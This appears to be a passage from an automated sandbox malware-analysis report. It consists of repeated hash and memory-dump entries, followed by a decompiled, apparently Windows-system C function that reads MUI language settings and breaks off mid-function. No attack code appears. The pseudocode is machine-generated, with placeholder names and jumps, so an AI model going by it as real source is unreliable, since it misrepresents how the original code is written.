                                                                                                                                                            • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                            • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                                                                            • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                            • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                            • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                            • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                            • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                            • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                                                                            • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                                                                            • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                            • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                                                                            • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                                                                            • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                            • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                                                                            • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                                                                            • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                            • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                            • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                            • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                            • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                                                                            • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                                                                            • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                            • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                            • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                            • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                            • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                            • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                            • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                            • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                            • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                            • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                            • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                            • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                            • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                            • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                            • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                            • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                            • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                            • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                            • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                            • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                            • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                            • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00978788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				short* _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                            				short* _t235;
                                                                                                                                                            				intOrPtr _t257;
                                                                                                                                                            				short* _t261;
                                                                                                                                                            				intOrPtr _t284;
                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                            				void* _t314;
                                                                                                                                                            				signed int _t318;
                                                                                                                                                            				short* _t319;
                                                                                                                                                            				intOrPtr _t321;
                                                                                                                                                            				void* _t328;
                                                                                                                                                            				void* _t329;
                                                                                                                                                            				char* _t332;
                                                                                                                                                            				signed int _t333;
                                                                                                                                                            				signed int* _t334;
                                                                                                                                                            				void* _t335;
                                                                                                                                                            				void* _t338;
                                                                                                                                                            				void* _t339;
                                                                                                                                                            
                                                                                                                                                            				_t328 = __edx;
                                                                                                                                                            				_t322 = __ecx;
                                                                                                                                                            				_t318 = 0;
                                                                                                                                                            				_t334 = _a4;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v40 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				if(_t334 == 0) {
                                                                                                                                                            					_t329 = 0xc000000d;
                                                                                                                                                            					L49:
                                                                                                                                                            					_t334[0x11] = _v56;
                                                                                                                                                            					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                            					_t334[0x12] = _v60;
                                                                                                                                                            					_t334[0x13] = _v28;
                                                                                                                                                            					_t334[0x17] = _v20;
                                                                                                                                                            					_t334[0x16] = _v48;
                                                                                                                                                            					_t334[0x18] = _v40;
                                                                                                                                                            					_t334[0x14] = _v32;
                                                                                                                                                            					_t334[0x15] = _v52;
                                                                                                                                                            					return _t329;
                                                                                                                                                            				}
                                                                                                                                                            				_v56 = 0;
                                                                                                                                                            				if(E00978460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_v56 = 1;
                                                                                                                                                            					if(_v8 != 0) {
                                                                                                                                                            						_t207 = E0095E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_push(1);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E0097718A(_t207);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_v60 = _v60 | 0xffffffff;
                                                                                                                                                            				if(E00978460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_t333 =  *_v8;
                                                                                                                                                            					_v60 = _t333;
                                                                                                                                                            					_t314 = E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					_push(_t333);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E0097718A(_t314);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_t216 = E00978460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                            				_t332 = ";";
                                                                                                                                                            				if(_t216 < 0) {
                                                                                                                                                            					L17:
                                                                                                                                                            					if(E00978460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            						L30:
                                                                                                                                                            						if(E00978460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            							L46:
                                                                                                                                                            							_t329 = 0;
                                                                                                                                                            							L47:
                                                                                                                                                            							if(_v8 != _t318) {
                                                                                                                                                            								E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							if(_v28 != _t318) {
                                                                                                                                                            								if(_v20 != _t318) {
                                                                                                                                                            									E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            									_v20 = _t318;
                                                                                                                                                            									_v40 = _t318;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							goto L49;
                                                                                                                                                            						}
                                                                                                                                                            						_t231 = _v24;
                                                                                                                                                            						_t322 = _t231 + 4;
                                                                                                                                                            						_push(_t231);
                                                                                                                                                            						_v52 = _t322;
                                                                                                                                                            						E0097718A(_t231);
                                                                                                                                                            						if(_t322 == _t318) {
                                                                                                                                                            							_v32 = _t318;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v32 = E0095E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            						}
                                                                                                                                                            						if(_v32 == _t318) {
                                                                                                                                                            							_v52 = _t318;
                                                                                                                                                            							L58:
                                                                                                                                                            							_t329 = 0xc0000017;
                                                                                                                                                            							goto L47;
                                                                                                                                                            						} else {
                                                                                                                                                            							E00952340(_v32, _v8, _v24);
                                                                                                                                                            							_v16 = _v32;
                                                                                                                                                            							_a4 = _t318;
                                                                                                                                                            							_t235 = E0096E679(_v32, _t332);
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t319 = _t235;
                                                                                                                                                            								if(_t319 == 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								 *_t319 = 0;
                                                                                                                                                            								_t321 = _t319 + 2;
                                                                                                                                                            								E0095E2A8(_t322,  &_v68, _v16);
                                                                                                                                                            								if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            								_v16 = _t321;
                                                                                                                                                            								_t235 = E0096E679(_t321, _t332);
                                                                                                                                                            								_pop(_t322);
                                                                                                                                                            							}
                                                                                                                                                            							_t236 = _v16;
                                                                                                                                                            							if( *_v16 != _t319) {
                                                                                                                                                            								E0095E2A8(_t322,  &_v68, _t236);
                                                                                                                                                            								if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							if(_a4 == 0) {
                                                                                                                                                            								E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                            								_v52 = _v52 & 0x00000000;
                                                                                                                                                            								_v32 = _v32 & 0x00000000;
                                                                                                                                                            							}
                                                                                                                                                            							if(_v8 != 0) {
                                                                                                                                                            								E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                                                            							_t318 = 0;
                                                                                                                                                            							goto L46;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t257 = _v24;
                                                                                                                                                            					_t322 = _t257 + 4;
                                                                                                                                                            					_push(_t257);
